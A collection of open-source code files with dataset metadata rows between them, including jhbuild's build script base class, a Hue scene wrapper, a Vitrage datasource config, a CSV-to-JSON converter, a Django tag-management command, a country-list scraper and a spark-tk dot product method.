ptime = md['Exif.Photo.DateTimeOriginal'].value
except KeyError:
ptime = False
return ptime
|
bsd-3-clause
| 3,740,261,318,711,634,000
| 37.146832
| 165
| 0.565658
| false
| 3.673861
| false
| false
| false
|
rpavlik/jhbuild-vrjuggler
|
jhbuild/frontends/buildscript.py
|
1
|
11073
|
# jhbuild - a build script for GNOME 1.x and 2.x
# Copyright (C) 2001-2006 James Henstridge
# Copyright (C) 2003-2004 Seth Nickell
#
# buildscript.py: base class of the various interface types
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import os
from jhbuild.utils import packagedb
from jhbuild.errors import FatalError, CommandError, SkipToPhase, SkipToEnd
class BuildScript:
def __init__(self, config, module_list=None):
if self.__class__ is BuildScript:
raise NotImplementedError('BuildScript is an abstract base class')
self.modulelist = module_list
self.module_num = 0
self.config = config
# the existence of self.config.prefix is checked in config.py
if not os.access(self.config.prefix, os.R_OK|os.W_OK|os.X_OK):
raise FatalError(_('install prefix (%s) must be writable') % self.config.prefix)
if not os.path.exists(self.config.checkoutroot):
try:
os.makedirs(self.config.checkoutroot)
except OSError:
raise FatalError(
_('checkout root (%s) can not be created') % self.config.checkoutroot)
if not os.access(self.config.checkoutroot, os.R_OK|os.W_OK|os.X_OK):
raise FatalError(_('checkout root (%s) must be writable') % self.config.checkoutroot)
if self.config.copy_dir and not os.path.exists(self.config.copy_dir):
try:
os.makedirs(self.config.copy_dir)
except OSError:
raise FatalError(
_('checkout copy dir (%s) can not be created') % self.config.copy_dir)
if not os.access(self.config.copy_dir, os.R_OK|os.W_OK|os.X_OK):
raise FatalError(_('checkout copy dir (%s) must be writable') % self.config.copy_dir)
packagedbdir = os.path.join(self.config.prefix, 'share', 'jhbuild')
try:
if not os.path.isdir(packagedbdir):
os.makedirs(packagedbdir)
except OSError:
raise FatalError(_('could not create directory %s') % packagedbdir)
self.packagedb = packagedb.PackageDB(os.path.join(packagedbdir,
'packagedb.xml'))
def execute(self, command, hint=None, cwd=None, extra_env=None):
'''Executes the given command.
If an error occurs, CommandError is raised. The hint argument
gives a hint about the type of output to expect.
'''
raise NotImplementedError
def build(self, phases=None):
'''start the build of the current configuration'''
self.start_build()
failures = [] # list of modules that couldn't be built
self.module_num = 0
for module in self.modulelist:
self.module_num = self.module_num + 1
if self.config.min_age is not None:
installdate = self.packagedb.installdate(module.name)
if installdate > self.config.min_age:
self.message(_('Skipping %s (installed recently)') % module.name)
continue
self.start_module(module.name)
failed = False
for dep in module.dependencies:
if dep in failures:
if self.config.module_nopoison.get(dep,
self.config.nopoison):
self.message(_('module %(mod)s will be built even though %(dep)s failed')
% { 'mod':module.name, 'dep':dep })
else:
self.message(_('module %(mod)s not built due to non buildable %(dep)s')
% { 'mod':module.name, 'dep':dep })
failed = True
if failed:
failures.append(module.name)
self.end_module(module.name, failed)
continue
if not phases:
build_phases = self.get_build_phases(module)
else:
build_phases = phases
phase = None
num_phase = 0
# if there is an error and a new phase is selected (be it by the
# user or an automatic system), the chosen phase must absolutely
# be executed, it should in no condition be skipped automatically.
# The force_phase variable flags that condition.
force_phase = False
while num_phase < len(build_phases):
last_phase, phase = phase, build_phases[num_phase]
try:
if not force_phase and module.skip_phase(self, phase, last_phase):
num_phase += 1
continue
except SkipToEnd:
break
if not module.has_phase(phase):
# skip phases that do not exist, this can happen when
                    # phases were explicitly passed to this method.
num_phase += 1
continue
self.start_phase(module.name, phase)
error = None
try:
try:
error, altphases = module.run_phase(self, phase)
except SkipToPhase, e:
try:
num_phase = build_phases.index(e.phase)
except ValueError:
break
continue
except SkipToEnd:
break
finally:
self.end_phase(module.name, phase, error)
if error:
try:
nextphase = build_phases[num_phase+1]
except IndexError:
nextphase = None
newphase = self.handle_error(module, phase,
nextphase, error,
altphases)
force_phase = True
if newphase == 'fail':
failures.append(module.name)
failed = True
break
if newphase is None:
break
if newphase in build_phases:
num_phase = build_phases.index(newphase)
else:
# requested phase is not part of the plan, we insert
# it, then fill with necessary phases to get back to
# the current one.
filling_phases = self.get_build_phases(module, targets=[phase])
canonical_new_phase = newphase
if canonical_new_phase.startswith('force_'):
# the force_ phases won't appear in normal build
# phases, so get the non-forced phase
canonical_new_phase = canonical_new_phase[6:]
if canonical_new_phase in filling_phases:
filling_phases = filling_phases[
filling_phases.index(canonical_new_phase)+1:-1]
build_phases[num_phase:num_phase] = [newphase] + filling_phases
if build_phases[num_phase+1] == canonical_new_phase:
# remove next phase if it would just be a repeat of
# the inserted one
del build_phases[num_phase+1]
else:
force_phase = False
num_phase += 1
self.end_module(module.name, failed)
self.end_build(failures)
if failures:
return 1
return 0
def get_build_phases(self, module, targets=None):
'''returns the list of required phases'''
if targets:
tmp_phases = targets[:]
else:
tmp_phases = self.config.build_targets[:]
i = 0
while i < len(tmp_phases):
phase = tmp_phases[i]
depadd = []
try:
phase_method = getattr(module, 'do_' + phase)
except AttributeError:
# unknown phase for this module type, simply skip
del tmp_phases[i]
continue
if hasattr(phase_method, 'depends'):
for subphase in phase_method.depends:
if subphase not in tmp_phases[:i+1]:
depadd.append(subphase)
if depadd:
tmp_phases[i:i] = depadd
else:
i += 1
# remove duplicates
phases = []
for phase in tmp_phases:
if not phase in phases:
phases.append(phase)
return phases
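    # Sketch of the dependency expansion above (module and phase names are made up):
    #
    #   def do_build(buildscript): pass
    #   def do_install(buildscript): pass
    #   do_install.depends = ('build',)
    #   # a module exposing these as do_build/do_install, combined with
    #   # build_targets = ['install'], expands to the phase list ['build', 'install'];
    #   # phases the module type does not implement are silently dropped.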
def start_build(self):
'''Hook to perform actions at start of build.'''
pass
def end_build(self, failures):
'''Hook to perform actions at end of build.
The argument is a list of modules that were not buildable.'''
pass
def start_module(self, module):
'''Hook to perform actions before starting a build of a module.'''
pass
def end_module(self, module, failed):
'''Hook to perform actions after finishing a build of a module.
The argument is true if the module failed to build.'''
pass
def start_phase(self, module, phase):
'''Hook to perform actions before starting a particular build phase.'''
pass
def end_phase(self, module, phase, error):
'''Hook to perform actions after finishing a particular build phase.
The argument is a string containing the error text if something
went wrong.'''
pass
def message(self, msg, module_num=-1):
'''Display a message to the user'''
raise NotImplementedError
def set_action(self, action, module, module_num=-1, action_target=None):
'''inform the buildscript of a new stage of the build'''
raise NotImplementedError
def handle_error(self, module, phase, nextphase, error, altphases):
'''handle error during build'''
raise NotImplementedError
|
gpl-2.0
| 3,736,484,522,379,380,700
| 40.943182
| 101
| 0.530118
| false
| 4.748285
| true
| false
| false
|
Bioto/Huuey-python
|
huuey/hue/scenes/scene.py
|
1
|
1071
|
from huuey.paths import Paths
class Scene:
name = None
lights = []
owner = None
recycle = None
locked = None
appdata = None
picture = None
lastupdated = None
version = None
_id = None
_parent = None
def __init__(self, obj, parent, _id):
self._parent = parent
self._id = _id
self._map(obj)
def get_id(self):
return self._id
def _map(self, obj):
for key in obj:
            setattr(self, key, obj[key])
@staticmethod
def create(name, lights, controller, recycle=False):
request = controller.request(Paths.SceneCREATE, data={
'name': name,
'lights': lights,
'recycle': recycle
})
return request[0]['success']['id']
def activate(self):
return self._parent.request(Paths.SceneGroup, data={
'scene': self._id
})
def delete(self):
self._parent.request(Paths.SceneDEL, additional={
'id': self._id
})
self._parent.remove_scene(self._id)
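# Usage sketch (the `controller` below stands for any object exposing the same
# .request() interface the Scene methods rely on):
#
#   scene_id = Scene.create('Evening', ['1', '2', '3'], controller)
#   scene = Scene({'name': 'Evening'}, controller, scene_id)
#   scene.activate()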
|
mit
| 6,638,197,520,970,899,000
| 20
| 62
| 0.535948
| false
| 3.894545
| false
| false
| false
|
openstack/vitrage
|
tools/datasource-scaffold/sample/__init__.py
|
1
|
1820
|
# Copyright 2018 - Vitrage team
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from vitrage.common.constants import DatasourceOpts as DSOpts
from vitrage.common.constants import UpdateMethod
SAMPLE_DATASOURCE = 'sample'
OPTS = [
cfg.StrOpt(DSOpts.TRANSFORMER,
default='vitrage.datasources.sample.transformer.'
'SampleTransformer',
help='Sample transformer class path',
required=True),
cfg.StrOpt(DSOpts.DRIVER,
default='vitrage.datasources.sample.driver.'
'SampleDriver',
help='Sample driver class path',
required=True),
cfg.StrOpt(DSOpts.UPDATE_METHOD,
default=UpdateMethod.PULL,
               help='None: updates only via Vitrage periodic snapshots. '
                    'Pull: updates periodically. '
                    'Push: updates by getting notifications from the'
                    ' datasource itself.',
required=True),
cfg.IntOpt(DSOpts.CHANGES_INTERVAL,
default=30,
min=10,
               help='interval in seconds between checking changes in the '
                    'sample configuration files')]
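# Registration sketch (Vitrage normally registers datasource options itself; the
# explicit group name below is an assumption for illustration only):
#
#   conf = cfg.ConfigOpts()
#   conf.register_opts(OPTS, group=SAMPLE_DATASOURCE)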
class SampleFields(object):
TYPE = 'type'
ID = 'id'
|
apache-2.0
| 5,598,332,246,566,623,000
| 36.916667
| 75
| 0.636813
| false
| 4.482759
| false
| false
| false
|
angloc/savutil
|
csv2json.py
|
1
|
3749
|
# Convert a CSV file into a JSON object with distribution
import classifiedunicodevalue
from classifiedunicodevalue import ClassifiedUnicodeValue
from datautil import compressedValueSequence, compressedValues
import unicodecsv
from version import savutilName, savutilVersion
def blankNone (x):
if x is None:
return u""
else:
return unicode (x)
def objectify (x):
if x == "":
return None
else:
try:
i = int (x)
return i
except:
try:
f = float (x)
                return f
except:
return x
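# Behaviour of the helpers above, for reference:
#
#   objectify("")     -> None
#   objectify("42")   -> 42
#   objectify("3.5")  -> 3.5
#   objectify("text") -> "text"   (returned unchanged)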
if __name__ == "__main__":
import getopt
import json
import os
import sys
import xlrd
optlist, args = getopt.getopt(sys.argv[1:], 'ad:h:s:e:o:w:')
delimiter = ","
headerIndex = None
skipLines = None
encoding = "cp1252"
outputPath = ""
worksheetName = None
for (option, value) in optlist:
if option == "-d":
delimiter = value
if option == "-e":
encoding = value
if option == "-h":
headerIndex = int (value)
if option == "-o":
outputPath = value
if option == "-s":
skipLines = int (value)
if option == "-w":
worksheetName = value
if skipLines is None:
if headerIndex is None:
headerIndex = 1
skipLines = headerIndex
if len (args) < 1 or\
headerIndex > skipLines:
print "--Usage: [-d,] [-ecp1252] [-h1] [-s1] <inputFile> [<outputFile>]"
sys.exit (0)
(root, csvExt) = os.path.splitext (args [0])
if not csvExt:
if worksheetName:
csvExt = ".xlsx"
else:
csvExt = ".csv"
inputFilename = root + csvExt
if len (args) > 1:
outputFilename = args [1]
else:
outputFilename = os.path.join (outputPath, root + ".json")
if headerIndex:
print "..Using line %d for headers" % headerIndex
if not (skipLines == 1 and headerIndex == 1):
print "..Taking data from line %d onwards" % skipLines
if worksheetName:
print "..Looking for worksheet '%s' in workbook %s" %\
(worksheetName, inputFilename)
wb = xlrd.open_workbook (inputFilename)
ws = wb.sheet_by_name (worksheetName)
print ws.ncols, ws.nrows
csvRows = [
[ws.cell_value (rowx, colx) for colx in xrange (ws.ncols)]
for rowx in xrange (ws.nrows)
]
else:
csvFile = open (inputFilename)
csv = unicodecsv.UnicodeReader (csvFile, encoding=encoding, delimiter=delimiter)
csvRows = list (csv)
csvFile.close ()
if skipLines > len (csvRows):
print "--Only %d row(s) found in CSV file, %d required for header" %\
(len (csvRows), skipLines)
sys.exit (0)
if headerIndex:
headers = csvRows [headerIndex-1]
csvRows = csvRows [skipLines:]
print "..%d row(s) found in input" % len (csvRows)
jsonObject = {
"origin": "csv2json %s from %s" %
(savutilVersion, inputFilename),
"code_lists": {},
"variable_sequence": headers,
"total_count": len (csvRows),
"variables": {},
"data": {}
}
variables = jsonObject ["variables"]
data = jsonObject ["data"]
for index, variableName in enumerate (headers):
values = [ClassifiedUnicodeValue (row [index]).value for row in csvRows]
distribution = {}
for value in values:
if distribution.has_key (value):
distribution [value] += 1
else:
distribution [value] = 1
cd = classifiedunicodevalue.ClassifiedDistribution (distribution)
if cd.dataType == "integer":
jsonType = "integer"
elif cd.dataType == "decimal":
jsonType = "decimal"
elif cd.dataType == "text":
jsonType = "string"
else:
jsonType = "null"
variables [variableName] = {
"sequence": index + 1,
"name": variableName,
"json_type": jsonType,
"distribution": cd.toObject (includeTotal=False)
}
data [variableName] = compressedValues (values, jsonType)
jsonFile = open (outputFilename, 'wb')
json.dump (jsonObject, jsonFile,
sort_keys=True,
indent=4,
separators=(',', ': ')
)
jsonFile.close ()
|
gpl-2.0
| 4,556,128,825,799,290,000
| 23.503268
| 82
| 0.660443
| false
| 2.987251
| false
| false
| false
|
ideascube/ideascube
|
ideascube/management/commands/tags.py
|
1
|
7027
|
import sys
from itertools import groupby
from operator import itemgetter
from django.utils.termcolors import colorize
from taggit.models import Tag, TaggedItem
from ideascube.management.base import BaseCommandWithSubcommands
from ideascube.utils import sanitize_tag_name
def log(text, **kwargs):
sys.stdout.write(colorize(str(text), **kwargs) + '\n')
def notice(text, **kwargs):
log(text, fg='blue')
def exit(text, **kwargs):
log(text, fg='red')
sys.exit(1)
class Command(BaseCommandWithSubcommands):
help = "Manage tags"
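# Example CLI usage (tag names below are hypothetical):
#   ./manage.py tags count wifi
#   ./manage.py tags rename Wifi wifi
#   ./manage.py tags sanitize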
def add_arguments(self, parser):
super().add_arguments(parser)
count = self.subs.add_parser('count', help='Count tag usage')
count.add_argument('name', help='Tag name we want to count.')
count.set_defaults(func=self.count)
delete = self.subs.add_parser('delete', help='Delete tag')
delete.add_argument('name', help='Tag name we want to delete.')
delete.add_argument('--force', action='store_true',
help='Force delete even if tag is still used.')
delete.set_defaults(func=self.delete)
rename = self.subs.add_parser('rename', help='Rename a tag')
rename.add_argument('old', help='Old name.')
rename.add_argument('new', help='New name.')
rename.set_defaults(func=self.rename)
replace = self.subs.add_parser('replace',
help='Replace tag by another and delete it')
replace.add_argument('old', help='Old tag name.')
replace.add_argument('new', help='New tag name.')
replace.set_defaults(func=self.replace)
sanitize = self.subs.add_parser('sanitize',
help=('Sanitize existing tags.\n'
'Remove duplicates, clean characters...'))
sanitize.set_defaults(func=self.sanitize)
list_ = self.subs.add_parser('list', help='List tags')
list_.set_defaults(func=self.list)
def handle(self, *args, **options):
log('-'*80, fg='white')
return super().handle(*args, **options)
def _count(self, name):
return TaggedItem.objects.filter(tag__name=name).count()
def get_tag_or_exit(self, name):
tag = Tag.objects.filter(name=name).first()
if not tag:
exit('No tag found with name "{}"'.format(name))
return tag
def count(self, options):
count = self._count(options['name'])
notice('{count} object(s) tagged with "{name}"'.format(count=count,
**options))
def delete(self, options):
name = options['name']
tag = self.get_tag_or_exit(name)
count = self._count(name)
force = options.get('force')
if count and not force:
confirm = input('Tag "{}" is still linked to {} items.\n'
'Type "yes" to confirm delete or "no" to '
'cancel: '.format(name, count))
if confirm != 'yes':
exit("Delete cancelled.")
tag.delete()
notice('Deleted tag "{name}".'.format(**options))
def rename(self, options):
if options['old'] == options['new']:
exit('Nothing to rename, tags are equal.')
tag = self.get_tag_or_exit(options['old'])
if Tag.objects.filter(name=options['new']).exclude(pk=tag.pk).exists():
exit('Tag "{new}" already exists. Aborting.'.format(**options))
tag.name = options['new']
tag.save()
notice('Renamed "{old}" to "{new}".'.format(**options))
def replace(self, options):
if options['old'] == options['new']:
exit('Nothing to rename, tags are equal.')
old = self.get_tag_or_exit(options['old'])
new, created = Tag.objects.get_or_create(name=options['new'])
if created:
notice('Created tag "{new}"'.format(**options))
relations = TaggedItem.objects.filter(tag=old)
for relation in relations:
content = relation.content_object
notice('Processing "{}"'.format(repr(content)))
relation.delete()
content.tags.add(new)
old.delete()
notice('Deleted "{}"'.format(old))
def list(self, options):
row = '{:<40}{:<40}{}'
print(row.format('name', 'slug', 'count'))
print(row.format('.' * 40, '.' * 40, '.' * 40))
for tag in Tag.objects.order_by('slug'):
print(row.format(tag.name, tag.slug, self._count(tag.name)))
def sanitize(self, options):
all_tags = ((sanitize_tag_name(t.name), t) for t in Tag.objects.all())
all_tags = sorted(all_tags, key=itemgetter(0))
all_tags = groupby(all_tags, key=itemgetter(0))
for new_tag_name, tags in all_tags:
tags = (t[1] for t in tags)
if not new_tag_name:
# No need to delete relation, happy cascading !
for tag in tags:
tag.delete()
continue
tag = next(tags)
other_equivalent_tags = list(tags)
# All the relations we need to redirect to `tag`
other_relations = TaggedItem.objects.filter(
tag__in=other_equivalent_tags)
for relation in other_relations:
# if an object `o` is tagged with tag `foo` and `Foo`, the
# relation `o-Foo` must be changed to `o-foo`. But this relation
# already exists, so, instead, we must delete `o-Foo`,
# not change it.
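# For instance (hypothetical data): if an item is tagged with both
# 'Wifi' and 'wifi', the duplicate relation is deleted rather than renamed.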
existing_relations = TaggedItem.objects.filter(
tag=tag,
object_id=relation.content_object.id,
content_type=relation.content_type)
if not existing_relations.exists():
# We must change the relation
relation.tag = tag
relation.save()
else:
# We have existing relation(s).
# We should not have more than one because we cannot have
# the *exact* same relation twice but let's be safe :
# delete any extra relation.
extra_relations = list(existing_relations)[1:]
for rel in extra_relations:
rel.delete()
# Then delete the current relation because we know we have
# an existing relation.
relation.delete()
# There is no relation to other tags left, delete them.
for t in other_equivalent_tags:
t.delete()
# Be sure our tag is correctly renamed.
# We do it at the end because the tag's name is unique and so,
# we want to be sure that all potential duplicates have been
# deleted/changed.
tag.name = new_tag_name
tag.save()
|
agpl-3.0
| -4,190,601,327,684,026,000
| 38.477528
| 79
| 0.552156
| false
| 4.22042
| false
| false
| false
|
hanteng/country-groups
|
scripts/_construct_data_EU-Asia.py
|
1
|
4189
|
# -*- coding: utf-8 -*-
# Discrimination knows no bounds; turning back is the shore. Keys rise and fall; feelings real and illusory.
# Correction
import os.path, glob
import requests
from lxml.html import fromstring, tostring, parse
from io import StringIO, BytesIO
import codecs
import pandas as pd
import json
XML_encoding="utf-8"
# Data source
URL_ = "https://ec.europa.eu/europeaid/regions/asia-0_en"
URL_country_names_template = "https://raw.githubusercontent.com/hanteng/country-names/master/data/CLDR_country_name_{locale}.tsv"
URL_country_names = URL_country_names_template.format(locale= 'en')
# Xpath extraction
_xpath = '//*[@id="block-views-8eba70350aa66960065a1bb4224c751a"]/div/div/div/div/ul/li/a/text()'
## Outpuing Lists
PE = 'EU-Asia'
path_data = u'../data'
outputfn1 = os.path.join(path_data, "PE_org.json")
outputfn2 = os.path.join(path_data, "CLDR_UN_region.tsv")
def url_request (url):
r = requests.get(url)
if r.status_code == 200:
#r.raw.decode_content = True
return r
else:
print ("Downloading the data from {0} failed. Plese check Internet connections.".format(XML_src_url))
return None
def url_local_request (url):
fn_local = os.path.join(path_data, PE+ ".htm")
print (fn_local) #debug
try:
tree = parse(fn_local)
except:
r = url_request (url)
XML_src=r.content
with codecs.open(fn_local, "w", XML_encoding) as file:
file.write(XML_src.decode(XML_encoding))
#from lxml.html.clean import clean_html
#XML_src = clean_html(XML_src)
tree = fromstring(XML_src)
return tree
t = url_local_request(URL_)
list_country_names_Web = t.xpath(_xpath) # Based on the network map http://www.tein.asia/tein4/network/maps.do TW is included and 24 listed
print (list_country_names_Web)
## Retrive data directly from unicode-cldr project hosted at github
print ("Retrieve country names data now ...")
locale = "en"
url = URL_country_names_template.format(locale=locale)
df_results = pd.read_csv(url, sep='\t', encoding='utf-8',
na_values=[], keep_default_na = False,
names = ['c','n'] , index_col='c',
)
## Construct dictionary for country/region names
c_names = df_results.to_dict()['n'] #http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.to_dict.html
c_names_inv = {v: k for k, v in c_names.items()}
## Country names fuzzy match
from fuzzywuzzy import process
choice=[]
for i, c_name_Web in enumerate(list_country_names_Web):
#found_candidates = [x for x in c_names_inv.keys() if fuzzy_match(x,c_name_Web)==True]
found_candidate = process.extract(c_name_Web, c_names_inv.keys(), limit=1)
found_candidate_c = c_names_inv[found_candidate[0][0]]
choice_item = [i, c_name_Web, found_candidate, found_candidate_c]
#print (choice_item)
choice.append(choice_item)
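# Each entry of `choice` now holds [index, scraped name, fuzzy candidates,
# guessed ISO alpha-2 code], e.g. (illustrative values only):
#   [3, 'Viet Nam', [('Vietnam', 95)], 'VN']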
import ast
done = False
while not(done):
try:
# Note: Python 2.x users should use raw_input, the equivalent of 3.x's input
prn= [repr(x) for x in choice]
print ("\n\r".join(prn))
i = int(input("Please enter your corrections: Serial no (-1:None): "))
if i==-1:
print ("Done!")
done = True
break
else:
if i in range(len(choice)):
c = input("Please enter your corrections: Country code (ISO-alpha2): ")
choice[i][3] = c
else:
print("Sorry, Please revise your input.")
except ValueError:
print("Sorry, I didn't understand that.")
#better try again... Return to the start of the loop
continue
list_country_codes_Web = [x[3] for x in choice]
print (list_country_codes_Web)
print (list_country_names_Web)
print ("==========")
PE_org = dict()
with codecs.open(outputfn1, encoding='utf-8', mode='r+') as fp:
lines=fp.readlines()
PE_org = json.loads(u"".join(lines))
print ("Before:", PE_org.keys())
d={PE: list_country_codes_Web}
print("Adding:",d)
PE_org.update(d)
print ("After:", PE_org.keys())
with codecs.open(outputfn1, encoding='utf-8', mode='w') as fp:
json.dump(PE_org, fp)
|
gpl-3.0
| 8,520,566,600,957,169,000
| 29.962687
| 140
| 0.633888
| false
| 3.091654
| false
| false
| false
|
eckardm/archivematica
|
src/dashboard/src/components/archival_storage/forms.py
|
1
|
1245
|
# This file is part of Archivematica.
#
# Copyright 2010-2013 Artefactual Systems Inc. <http://artefactual.com>
#
# Archivematica is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Archivematica is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Archivematica. If not, see <http://www.gnu.org/licenses/>.
from django import forms
class CreateAICForm(forms.Form):
results = forms.CharField(label=None, required=True, widget=forms.widgets.HiddenInput())
class ReingestAIPForm(forms.Form):
METADATA_ONLY = 'metadata'
OBJECTS = 'objects'
REINGEST_CHOICES = (
(METADATA_ONLY, 'Re-ingest metadata only'),
(OBJECTS, 'Re-ingest metadata and objects')
)
reingest_type = forms.ChoiceField(choices=REINGEST_CHOICES, widget=forms.RadioSelect, required=True)
|
agpl-3.0
| -1,230,661,360,885,088,800
| 37.90625
| 105
| 0.746185
| false
| 3.705357
| false
| false
| false
|
petropavel13/2photo-api
|
utils.py
|
1
|
3700
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals # py2
from datetime import datetime
from django.utils import timezone as tz
from django.utils.timezone import is_naive, make_aware
msk_tz = tz.pytz.timezone('Europe/Moscow')
date_mapping = {
'января': '1',
'февраля': '2',
'марта': '3',
'апреля': '4',
'мая': '5',
'июня': '6',
'июля': '7',
'августа': '8',
'сентября': '9',
'октября': '10',
'ноября': '11',
'декабря': '12',
}
def to_msk_datetime(datetime):
if is_naive(datetime):
return datetime.replace(tzinfo=msk_tz)
elif datetime.tzinfo == msk_tz:
return datetime
else:
return tz.localtime(datetime, msk_tz)
def if_not_none(func):
return lambda arg: None if arg is None else func(arg)
@if_not_none
def prct_to_int(percent):
return int(percent[:percent.index('%')])
@if_not_none
def url_to_id(url):
str_id = url[url.rindex('/') + 1:]
return int(str_id) if len(str_id) > 0 else None
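# Illustrative behaviour of the helpers above (values are made up):
#   prct_to_int('42%') -> 42, prct_to_int(None) -> None
#   url_to_id('http://example.com/users/123') -> 123, url_to_id(None) -> None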
def ru_str_date_to_date_stream(ru_date):
new_date = ru_date
for ru, en in date_mapping.items():
new_date = new_date.replace(ru, en)
py2_date = new_date.encode('utf-8')
py3_format = '%d %m %Y г. %H:%M'
py2_format = py3_format.encode('utf-8')
date = datetime.strptime(py2_date if isinstance(py2_date, str) else new_date,
py2_format if isinstance(py2_format, str) else py3_format)
return to_msk_datetime(date)
def ru_str_date_to_date_comment(ru_date):
new_date = ru_date
for ru, en in date_mapping.items():
new_date = new_date.replace(ru, en)
str_date = new_date.replace('\n ', '').replace(' ', '')
py3_date = '0' + str_date if str_date.index(':') == 1 else str_date
py2_date = py3_date.encode('utf-8')
py3_format = '%H:%M,%d %m %Y г.'
py2_format = py3_format.encode('utf-8')
date = datetime.strptime(py2_date if isinstance(py2_date, str) else py3_date,
py2_format if isinstance(py2_format, str) else py3_format)
return to_msk_datetime(date)
def ru_str_date_to_date_reg(ru_date):
new_date = ru_date
for ru, en in date_mapping.items():
new_date = new_date.replace(ru, en)
return to_msk_datetime(datetime.strptime(new_date, '%d %m %Y'))
def ru_str_date_to_date_last_visit(ru_date):
new_date = ru_date
for ru, en in date_mapping.items():
new_date = new_date.replace(ru, en)
date = datetime.strptime(new_date, '%d %m %Y, %H:%M')
return to_msk_datetime(date)
def clean_dict_for_model(dict_obj, dj_model):
return { f.name : dict_obj[f.name] for f in dj_model._meta.fields }
def dict_to_model_instance(dict_obj, dj_model):
return dj_model( **clean_dict_for_model(dict_obj, dj_model) )
def bulk_create_by_chunks(iterable_objects, dj_model, chunk_size=1024):
buffer = [None] * chunk_size
next_idx = 0
for obj in iterable_objects:
buffer[next_idx] = obj
next_idx += 1
if next_idx % chunk_size == 0:
dj_model.objects.bulk_create(buffer)
next_idx = 0
dj_model.objects.bulk_create(buffer[0:next_idx])
def namedtuples_to_model_instances_generator(namedtuples, dj_model):
for namedtuple in namedtuples:
yield dict_to_model_instance(namedtuple._asdict(), dj_model)
def bulk_save_namedtuples(namedtuples, dj_model, chunk_size=1024):
model_instances_generator = namedtuples_to_model_instances_generator(namedtuples, dj_model)
bulk_create_by_chunks(model_instances_generator, dj_model, chunk_size)
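# Sketch of intended usage (model and variable names are hypothetical):
#   bulk_save_namedtuples(parsed_photo_rows, Photo, chunk_size=512)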
|
mit
| -4,624,639,881,835,006,000
| 24.549296
| 95
| 0.617971
| false
| 2.829953
| false
| false
| false
|
shibanis1/spark-tk
|
python/sparktk/frame/ops/dot_product.py
|
1
|
3552
|
def dot_product(self, left_column_names,right_column_names,dot_product_column_name,default_left_values=None,default_right_values=None):
"""
Calculate dot product for each row in current frame.
Parameters
----------
:param left_column_names: (List[str]) Names of columns used to create the left vector (A) for each row.
Names should refer to a single column of type vector, or two or more columns of numeric scalars.
:param right_column_names: (List[str]) Names of columns used to create right vector (B) for each row.
Names should refer to a single column of type vector, or two or more columns of numeric scalars.
:param dot_product_column_name: (str) Name of column used to store the dot product.
:param default_left_values: (Optional[List[float]]) Default values used to substitute null values in the left vector. Default is None.
:param default_right_values: (Optional[List[float]]) Default values used to substitute null values in the right vector. Default is None.
:return: (Frame) returns a frame with give "dot_product" column name
Calculate the dot product for each row in a frame using values from two equal-length sequences of columns.
Dot product is computed by the following formula:
The dot product of two vectors :math:`A=[a_1, a_2, ..., a_n]` and :math:`B =[b_1, b_2, ..., b_n]` is :math:`a_1*b_1 + a_2*b_2 + ...+ a_n*b_n`.
The dot product for each row is stored in a new column in the existing frame.
Notes
-----
* If default_left_values or default_right_values are not specified, any null values will be replaced by zeros.
* This method applies only to columns containing numerical data.
Examples
--------
>>> data = [[1, 0.2, -2, 5], [2, 0.4, -1, 6], [3, 0.6, 0, 7], [4, 0.8, 1, 8]]
>>> schema = [('col_0', int), ('col_1', float),('col_2', int) ,('col_3', int)]
>>> my_frame = tc.frame.create(data, schema)
<progress>
Calculate the dot product for a sequence of columns in Frame object *my_frame*:
>>> my_frame.inspect()
[#] col_0 col_1 col_2 col_3
===============================
[0] 1 0.2 -2 5
[1] 2 0.4 -1 6
[2] 3 0.6 0 7
[3] 4 0.8 1 8
Modify the frame by computing the dot product for a sequence of columns:
>>> my_frame.dot_product(['col_0','col_1'], ['col_2', 'col_3'], 'dot_product')
<progress>
>>> my_frame.inspect()
[#] col_0 col_1 col_2 col_3 dot_product
============================================
[0] 1 0.2 -2 5 -1.0
[1] 2 0.4 -1 6 0.4
[2] 3 0.6 0 7 4.2
[3] 4 0.8 1 8 10.4
"""
if not isinstance(left_column_names, list):
left_column_names = [left_column_names]
if not isinstance(right_column_names, list):
right_column_names = [right_column_names]
self._scala.dotProduct(self._tc.jutils.convert.to_scala_list_string(left_column_names),
self._tc.jutils.convert.to_scala_list_string(right_column_names),
dot_product_column_name,
self._tc.jutils.convert.to_scala_option_list_double(default_left_values),
self._tc.jutils.convert.to_scala_option_list_double(default_right_values))
|
apache-2.0
| -7,716,103,984,630,105,000
| 46.36
| 146
| 0.561937
| false
| 3.62449
| false
| false
| false
|
bjoernmainz/simple-contact-form
|
images/bin/rename_speech.py
|
1
|
1168
|
#!/usr/bin/python
import os
import glob
import shutil
def rename(files):
new_files = []
for f in files:
dirname = os.path.dirname(f)
basename = os.path.basename(f)
file_type = ""
number = ""
print("------------")
print("Basename: %s") % basename
if not basename.find("ogg") == -1:
file_type = "ogg";
number = basename.replace(".ogg", "")
elif not basename.find("mp3") == -1:
file_type = "mp3";
number = basename.replace(".mp3", "")
else:
raise Exception("Not found")
print "Number: %s" % number
new_number = blist[number]
new_filename = "%s/%s_new.%s" % (dirname, blist[number], file_type)
print("%s -> %s") % (f, new_filename)
shutil.move(f, new_filename)
